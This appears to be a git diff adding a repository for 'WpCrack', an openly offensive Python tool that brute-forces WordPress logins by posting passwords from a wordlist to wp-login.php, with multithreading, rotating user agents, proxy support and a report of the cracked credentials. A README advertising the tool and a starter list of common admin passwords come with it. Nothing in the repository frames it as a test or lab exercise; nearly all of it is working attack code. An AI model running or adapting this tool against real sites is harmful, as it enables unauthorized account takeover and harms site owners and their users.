diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..cf13613 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2021 SondreX-ID + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000..5feb533 --- /dev/null +++ b/README.md @@ -0,0 +1,48 @@ + + +# WpCrack Tool + +![Python](https://img.shields.io/badge/Python-3.9.2-blue) +![License](https://img.shields.io/badge/License-MIT-brightgreen) + +> WordPress Brute Force Super Fast Login + +``` + .---. .----------- + / \ __ / ------ + / / \( )/ ----- + ////// ' \/ ` --- + //// / // : ★★ : --- + // / / /` '-- +// //..\ WpCrack Brute Froce Tool™ + ====UU====UU========================== + '//||\` + ''`` +usage: python WpCrack.py [options] +optional arguments: + -h, --help show this help message and exit + -V, --version show program's version number and exit + -d, --debug debugging mode + +target arguments: + -t , --target url of the target + -u , --username username of the target (default: admin) + -p , --password password of the target (change -p to --p + to use a wordlist) + + --timeout timed out for requests + --thread numbers of threading multiproccesor + (default: 5) + --proxy using a HTTP proxy (ex: + http://site.com:8000) + +Copyright © 2021 Andrew - Powered by Indonesian Darknet +``` + +## About +WpCrack is a tool used to force login into the WordPress CMS web application and is built in the Python programming language + +## Features +- Very fast login +- Use of HTTP proxies +- Multithreading or Multiprocessor diff --git a/WpCrack.py b/WpCrack.py new file mode 100644 index 0000000..471db52 --- /dev/null +++ b/WpCrack.py @@ -0,0 +1,212 @@ +#!/usr/bin/env python +""" +WpCrack is a hacking tool used to force login into the CMS WordPress website application. +Copyright © 2021 Andrew + +This program is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program. If not, see . +""" + +import os +import re +import time +import random +import logging +import urllib.parse +import urllib.request +import http.cookiejar +import concurrent.futures + +from pathlib import Path +from datetime import datetime +from argparse import FileType +from argparse import SUPPRESS +from argparse import ArgumentError +from argparse import ArgumentParser + +NAME = "WpCrack Brute Froce Tool" +BANNER = """\ + .---. .----------- + / \ __ / ------ + / / \( )/ ----- + ////// ' \/ ` --- + //// / // : ★★ : --- + // / / /` '-- +// //..\\ %s™ + ====UU====UU========================== + '//||\\` + ''`` +""" % (NAME) +VERSION = "1.0.1" # +LOGGERNAME = Path(__file__).stem +logging.basicConfig(format="[%(asctime)s][%(levelname)s] %(message)s", datefmt="%H:%M:%S") +log = logging.getLogger(LOGGERNAME) +log.setLevel(logging.INFO) + +logging.addLevelName(60, "SUCCESS") +def success(self, message, *args, **kws): + if self.isEnabledFor(60): + self._log(60, message, args, **kws) +logging.Logger.success = success + +logging.addLevelName(70, "FAILED") +def failed(self, message, *args, **kws): + if self.isEnabledFor(70): + self._log(70, message, args, **kws) +logging.Logger.failed = failed + +userAgent = [ + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', + 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', + 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', + 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0' +] + +""" banner tool """ +def banner(start = False): + current_time = "" + if start is True: + current_time = "[*] starting at " + datetime.now().strftime("%H:%M:%S (%d-%m-%Y)") + print(BANNER + current_time + "\n\n") + +""" read list """ +def sliceList(content): + lists = [] + content = content.readlines() + for line in content: + lists.append(line.replace("\n", "")) + return lists + + +def start(url, usr, pwd, timeout, ua, proxy): + form = { + "log" : usr, + "pwd" : pwd + } + url = urllib.parse.urljoin(url, "/wp-login.php/") + form = urllib.parse.urlencode(form).encode() + try: + request = urllib.request.Request(url, data=form, headers={"User-Agent":ua}) + if proxy != "": + request.set_proxy(proxy, "http") + + with urllib.request.urlopen(request, timeout=timeout) as respond: + if re.search("wp-admin", respond.url): + return pwd + except urllib.error.URLError as err: + raise Exception("no address associated with hostname, please check ur target URL or proxy host") + except Exception as err: + raise Exception(err) + +""" main function """ +def main(): + global log, userAgent + + """Parser arguments""" + parser = ArgumentParser( + usage="python %(prog)s [options]", + epilog="Copyright © 2021 Andrew - Powered by Indonesian Darknet", + ) + parser.add_argument("-V", "--version", action="version", version=VERSION) + parser.add_argument("-d", "--debug", action="store_const", const=logging.DEBUG, help="debugging mode") + target = parser.add_argument_group("target arguments") + target.add_argument("-t", "--target", dest="url", metavar="", help="url of the target", required=True) + target.add_argument("-u", "--username", dest="usr", metavar="", default="admin", help="username of the target (default: %(default)s)") + target.add_argument("-p", "--password", dest="pwd", metavar="", help="password of the target (change -p to --p to use a wordlist)") + target.add_argument("--p", dest="pwd_list", type=FileType('r'), help=SUPPRESS) + request = parser.add_argument_group() + request.add_argument("--timeout", metavar="", type=int, default=5, help="timed out for requests") + request.add_argument("--thread", metavar="", type=int, default=5, help="numbers of threading multiproccesor (default: %(default)s)") + request.add_argument("--proxy", metavar="", help="using a HTTP proxy (ex: http://site.com:8000)") + args = parser.parse_args() + + """Print a banner tool""" + banner(True) + + if args.debug: + log.setLevel(args.debug) + + proxy = "" + password = [] + if args.pwd: + password.append(args.pwd) + elif args.pwd_list: + password = sliceList(args.pwd_list) + else: + parser.error("the following arguments are required: -p/--p") + + log.debug("HTTP timeout is set to \""+ str(args.timeout) +"\" seconds") + timeout = args.timeout + + log.debug("setting a HTTP User-Agent") + userAgent = random.choice(userAgent) + + if args.proxy is not None: + proxy = args.proxy + log.info("\""+ args.proxy +"\" host is used as a proxy") + + try: + log.info("testing connection to the target") + """Try the connection and get the url""" + request = urllib.request.Request(args.url, headers={"User-Agent":userAgent}) + respond = urllib.request.urlopen(request, timeout=timeout) + except Exception as err: + raise Exception(err) + + log.info("use the word \""+ args.usr +"\" to be used as a username") + + logged = False + start_time = time.time() + if len(password) > 1: + log.debug("total data in wordlist: " + str(len(password)) + " words") + + log.info("starting a login brute force") + with concurrent.futures.ThreadPoolExecutor(max_workers=args.thread) as executor: + processed = (executor.submit(start, respond.url, args.usr, pwd, timeout, userAgent, proxy) for pwd in password) + for i, process in enumerate(concurrent.futures.as_completed(processed)): + if len(password) > 1: + print("[{}][INFO] testing {} password".format(datetime.now().strftime("%H:%M:%S") ,i), end="\r") + process = process.result() + if process: + logged = True + password = process + break + + if logged is True: + log.success("successfully entered into the target dashboard with username \""+args.usr+"\" and password \""+password+"\"") + else: + log.failed("cannot enter into the target dashboard") + log.info("time taken \""+ str(int(time.time() - start_time)) +" seconds\"") + +if __name__ == '__main__': + try: + main() + except Exception as err: + log.critical(err) \ No newline at end of file diff --git a/wordlist.txt b/wordlist.txt new file mode 100644 index 0000000..2e7a445 --- /dev/null +++ b/wordlist.txt @@ -0,0 +1,11 @@ +admin +pass +admin1234 +admin123456 +administrator +Administrator +SuperAdmin +password +password1234 +12345678 +adminpassword